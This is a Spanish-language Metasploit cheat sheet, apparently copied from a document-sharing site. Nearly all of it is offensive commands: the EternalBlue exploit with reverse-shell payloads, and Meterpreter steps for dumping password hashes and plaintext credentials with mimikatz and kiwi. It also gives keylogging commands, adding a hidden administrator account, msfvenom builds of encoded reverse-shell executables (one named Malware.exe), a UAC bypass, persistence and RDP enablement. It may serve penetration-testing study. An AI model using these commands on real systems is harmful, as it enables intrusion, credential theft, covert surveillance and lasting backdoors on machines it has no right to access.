Documentos de Académico
Documentos de Profesional
Documentos de Cultura
searchsploit [NOMBRE_EXPLOIT]
variables:
lhost
rhost
rport
lport
METERPRETER
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload
windows/x64/meterpreter/reverse_tcp
set PAYLOAD
generic/shell_bind_tcp
set PAYLOAD
generic/shell_reverse_tcp
show options
COMANDOS METERPRETER
help
sysinfo
getuid
getsystem -h
getprivs -h
hashdump
ps = arbol de procesos
getpid= identificar el proceso usado por meterpreter
pwd = ver la ruta donde te encuentro
migrate[PID] = elevar privilegios
SACAR LAS PASSWD EN TEXTO PLANO
load mimikatz
mimikatz_command
kerberos
KEYLOGGER
keyscan_start
keyscan_dump
COMANDOS SHELL
net user
net user [username] [password] = ver usuarios
net user [username] [password] /add = añadir un usuario
net user [username] = ver informacion del usuario
net localgroup administrators [username] /add = dar privilegios de administracion
net user [username] /delete = borrar un usuario
MSFVENOM
msfvenom --list archs = listar arquitecturas compatibles
msfvenom --list platforms = listar plataformas compatibles
msfvenom --list payloads = listado de payloads
msfvenom --list encoders = listado de encoders
msfvenom --list formats = listado de formatos
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter_reverse_tcp
LHOST=[ip_localhost] LPORT=[puerto_local4444] -e x86/shikata_ga_nai -b '\x00' -i 3
-f exe -o text.exe
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter_reverse_tcp
LHOST=10.88.0.225 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe -o
Malware.exe
POST EXPLOTACION
use exploit/windows/local/bypassuac_injection
show options
set session [numero session activa]
set LPORT [numero de puerto diferente al de la session de multihandler]
set LHOST [misma ip de la session de multihandler]
show targets
set target [numero de target es decir x64 o x86]
set payload windows/x64/meterpreter/reverse_tcp
load kiwi
creds_all
load mimikatz
kerberoz
run persistence -u -i 5 -p [puerto_session_privs] -r [ip_lhost] = mantener
persistencia
nc -nv [ip_equiporemoto] 3389 = verificar si tiene escritorio remoto
use post/windows/manage/enable_rdp
show options
set username [nuevo_username]
set password [nueva_clave]
set session [session_conprivilegiosde_postexploit]
run
rdesktop [ip_RHOST]